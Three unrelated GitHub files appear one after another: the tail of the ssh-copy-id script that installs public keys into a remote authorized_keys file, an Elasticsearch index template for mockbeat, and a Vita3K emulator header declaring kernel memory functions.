ControlPath=none \ -o LogLevel=INFO \ -o PreferredAuthentications=publickey \ -o IdentitiesOnly=yes "$@" exit 2>"$L_TMP_ID_FILE.stderr" </dev/null if [ "$?" = "$L_SUCCESS" ] ; then : > "$L_TMP_ID_FILE" else grep 'Permission denied' "$L_TMP_ID_FILE.stderr" >/dev/null || { sed -e 's/^/ERROR: /' <"$L_TMP_ID_FILE.stderr" >"$L_TMP_ID_FILE" cat >/dev/null #consume the other keys, causing loop to end } fi cat "$L_TMP_ID_FILE" done } ) eval "$L_CLEANUP" && trap - EXIT TERM INT QUIT if expr "$NEW_IDS" : "^ERROR: " >/dev/null ; then printf '\n%s: %s\n\n' "$0" "$NEW_IDS" >&2 exit 1 fi if [ -z "$NEW_IDS" ] ; then printf '\n%s: WARNING: All keys were skipped because they already exist on the remote system.\n' "$0" >&2 printf '\t\t(if you think this is a mistake, you may want to use -f option)\n\n' >&2 exit 0 fi printf '%s: INFO: %d key(s) remain to be installed -- if you are prompted now it is to install the new keys\n' "$0" "$(printf '%s\n' "$NEW_IDS" | wc -l)" >&2 } REMOTE_VERSION=$(ssh -v -o PreferredAuthentications=',' -o ControlPath=none "$@" 2>&1 | sed -ne 's/.*remote software version //p') case "$REMOTE_VERSION" in NetScreen*) populate_new_ids 1 for KEY in $(printf "%s" "$NEW_IDS" | cut -d' ' -f2) ; do KEY_NO=$(($KEY_NO + 1)) printf "%s\n" "$KEY" | grep ssh-dss >/dev/null || { printf '%s: WARNING: Non-dsa key (#%d) skipped (NetScreen only supports DSA keys)\n' "$0" "$KEY_NO" >&2 continue } [ "$DRY_RUN" ] || printf 'set ssh pka-dsa key %s\nsave\nexit\n' "$KEY" | ssh -T "$@" >/dev/null 2>&1 if [ $? = 255 ] ; then printf '%s: ERROR: installation of key #%d failed (please report a bug describing what caused this, so that we can make this message useful)\n' "$0" "$KEY_NO" >&2 else ADDED=$(($ADDED + 1)) fi done if [ -z "$ADDED" ] ; then exit 1 fi ;; *) # Assuming that the remote host treats ~/.ssh/authorized_keys as one might expect populate_new_ids 0 # in ssh below - to defend against quirky remote shells: use 'exec sh -c' to get POSIX; # 'cd' to be at $HOME; add a newline if it's missing; and all on one line, because tcsh. [ "$DRY_RUN" ] || printf '%s\n' "$NEW_IDS" | \ ssh "$@" "exec sh -c 'cd ; umask 077 ; mkdir -p .ssh && { [ -z "'`tail -1c .ssh/authorized_keys 2>/dev/null`'" ] || echo >> .ssh/authorized_keys ; } && cat >> .ssh/authorized_keys || exit 1 ; if type restorecon >/dev/null 2>&1 ; then restorecon -F .ssh .ssh/authorized_keys ; fi'" \ || exit 1 ADDED=$(printf '%s\n' "$NEW_IDS" | wc -l) ;; esac if [ "$DRY_RUN" ] ; then cat <<-EOF =-=-=-=-=-=-=-= Would have added the following key(s): $NEW_IDS =-=-=-=-=-=-=-= EOF else cat <<-EOF Number of key(s) added: $ADDED Now try logging into the machine, with: "ssh $SSH_OPTS" and check to make sure that only the key(s) you wanted were added. EOF fi # =-=-=-=
{ "pile_set_name": "Github" }
{ "mappings": { "_default_": { "_all": { "enabled": true, "norms": { "enabled": false } }, "dynamic_templates": [ { "template1": { "mapping": { "doc_values": true, "ignore_above": 1024, "index": "not_analyzed", "type": "{dynamic_type}" }, "match": "*" } } ], "properties": { "@timestamp": { "type": "date" }, "message": { "type": "string", "index": "analyzed" }, "offset": { "type": "long", "doc_values": "true" } } } }, "settings": { "index.refresh_interval": "5s" }, "template": "mockbeat-*" }
{ "pile_set_name": "Github" }
// Vita3K emulator project // Copyright (C) 2018 Vita3K team // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation; either version 2 of the License, or // (at your option) any later version. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License along // with this program; if not, write to the Free Software Foundation, Inc., // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. #pragma once #include <module/module.h> // TODO use macro EXPORT(SceUID, sceKernelFindMemBlockByAddr, Address addr, uint32_t size); EXPORT(int, sceKernelFreeMemBlock, SceUID uid); BRIDGE_DECL(sceKernelAllocMemBlock) BRIDGE_DECL(sceKernelAllocMemBlockForVM) BRIDGE_DECL(sceKernelAllocUnmapMemBlock) BRIDGE_DECL(sceKernelCheckModelCapability) BRIDGE_DECL(sceKernelCloseMemBlock) BRIDGE_DECL(sceKernelCloseVMDomain) BRIDGE_DECL(sceKernelFindMemBlockByAddr) BRIDGE_DECL(sceKernelFreeMemBlock) BRIDGE_DECL(sceKernelFreeMemBlockForVM) BRIDGE_DECL(sceKernelGetFreeMemorySize) BRIDGE_DECL(sceKernelGetMemBlockBase) BRIDGE_DECL(sceKernelGetMemBlockInfoByAddr) BRIDGE_DECL(sceKernelGetMemBlockInfoByRange) BRIDGE_DECL(sceKernelGetModel) BRIDGE_DECL(sceKernelGetModelForCDialog) BRIDGE_DECL(sceKernelGetSubbudgetInfo) BRIDGE_DECL(sceKernelIsPSVitaTV) BRIDGE_DECL(sceKernelOpenMemBlock) BRIDGE_DECL(sceKernelOpenVMDomain) BRIDGE_DECL(sceKernelSyncVMDomain)
{ "pile_set_name": "Github" }